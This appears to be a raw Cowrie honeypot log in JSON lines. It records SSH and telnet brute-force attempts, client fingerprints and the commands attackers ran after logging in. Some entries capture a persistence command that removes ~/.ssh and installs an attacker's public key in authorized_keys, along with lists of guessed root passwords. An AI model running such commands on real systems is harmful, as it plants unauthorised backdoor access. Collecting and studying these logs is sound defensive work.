{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:51:35.826073Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.login.success","username":"root","password":"access123456","message":"login attempt [root/access123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:51:36.896394Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:51:37.470173Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:51:37.470940Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:51:37.472142Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:51:37.727217Z","src_ip":"212.227.125.160","session":"01affe170546"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:51:37.727930Z","src_ip":"212.227.125.160","session":"01affe170546"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:37.746924Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:51:37.755613Z","src_ip":"212.227.125.160","session":"4b6d2b53f050"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:51:38.779105Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:51:38.779947Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:51:39.055603Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:39.056475Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:39.282655Z","src_ip":"212.227.125.160","session":"4b6d2b53f050"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40590,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca9b0eb53416","protocol":"ssh","message":"New connection: 212.227.235.229:40590 (1.2.3.4:22) [session: ca9b0eb53416]","sensor":"my-vps","timestamp":"2025-08-31T06:51:39.340988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:51:39.342753Z","src_ip":"212.227.235.229","session":"ca9b0eb53416"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:51:39.898183Z","src_ip":"212.227.235.229","session":"ca9b0eb53416"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:51:41.016366Z","src_ip":"212.227.235.229","session":"ca9b0eb53416"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:42.302240Z","src_ip":"212.227.235.229","session":"ca9b0eb53416"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47718,"dst_ip":"1.2.3.4","dst_port":22,"session":"9882a174b310","protocol":"ssh","message":"New connection: 212.227.235.229:47718 (1.2.3.4:22) [session: 9882a174b310]","sensor":"my-vps","timestamp":"2025-08-31T06:51:42.554749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:51:42.555778Z","src_ip":"212.227.235.229","session":"9882a174b310"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:51:42.820251Z","src_ip":"212.227.235.229","session":"9882a174b310"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.83.91","src_port":35826,"dst_ip":"1.2.3.4","dst_port":22,"session":"b94c351104c5","protocol":"ssh","message":"New connection: 203.195.83.91:35826 (1.2.3.4:22) [session: b94c351104c5]","sensor":"my-vps","timestamp":"2025-08-31T06:51:43.590337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:51:43.591424Z","src_ip":"203.195.83.91","session":"b94c351104c5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T06:51:43.809644Z","src_ip":"203.195.83.91","session":"b94c351104c5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:51:43.923184Z","src_ip":"212.227.235.229","session":"9882a174b310"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:44.189226Z","src_ip":"212.227.235.229","session":"9882a174b310"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:51:44.191823Z","src_ip":"212.227.235.229","session":"f86ae0533881"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32778,"dst_ip":"1.2.3.4","dst_port":22,"session":"579e40322504","protocol":"ssh","message":"New connection: 212.227.235.229:32778 (1.2.3.4:22) [session: 579e40322504]","sensor":"my-vps","timestamp":"2025-08-31T06:51:50.597095Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40366,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7700d0eece2","protocol":"telnet","message":"New connection: 212.227.125.160:40366 (1.2.3.4:23) [session: f7700d0eece2]","sensor":"my-vps","timestamp":"2025-08-31T06:51:53.648842Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:51:53.737313Z","src_ip":"212.227.125.160","session":"f7700d0eece2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:51:53.759475Z","src_ip":"212.227.125.160","session":"f7700d0eece2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:51:59.694105Z","src_ip":"212.227.235.229","session":"579e40322504"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:51:59.695040Z","src_ip":"212.227.235.229","session":"579e40322504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36054,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d35583f9be0","protocol":"ssh","message":"New connection: 212.227.235.229:36054 (1.2.3.4:22) [session: 3d35583f9be0]","sensor":"my-vps","timestamp":"2025-08-31T06:52:12.668151Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:52:13.147037Z","src_ip":"212.227.125.160","session":"01affe170546"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:13.354697Z","src_ip":"212.227.235.229","session":"3d35583f9be0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:52:13.355363Z","src_ip":"212.227.235.229","session":"3d35583f9be0"}
{"eventid":"cowrie.login.failed","username":"user","password":"password1","message":"login attempt [user/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:52:18.902586Z","src_ip":"212.227.235.229","session":"3d35583f9be0"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:20.704885Z","src_ip":"212.227.235.229","session":"3d35583f9be0"}
{"eventid":"cowrie.session.closed","duration":"47.2","message":"Connection lost after 47.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:21.772342Z","src_ip":"212.227.125.160","session":"01affe170546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52968,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb04e289cef6","protocol":"ssh","message":"New connection: 212.227.125.160:52968 (1.2.3.4:22) [session: cb04e289cef6]","sensor":"my-vps","timestamp":"2025-08-31T06:52:24.331758Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38545,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c83232969ee","protocol":"ssh","message":"New connection: 212.227.235.229:38545 (1.2.3.4:22) [session: 7c83232969ee]","sensor":"my-vps","timestamp":"2025-08-31T06:52:28.104892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:52:28.105845Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:52:28.664557Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc12345.","message":"login attempt [root/Abc12345.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:52:32.799382Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:52:33.463519Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:52:33.464219Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:52:33.465103Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54344,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e74318d136","protocol":"ssh","message":"New connection: 212.227.125.160:54344 (1.2.3.4:22) [session: 04e74318d136]","sensor":"my-vps","timestamp":"2025-08-31T06:52:33.625519Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:33.645415Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:52:34.028656Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
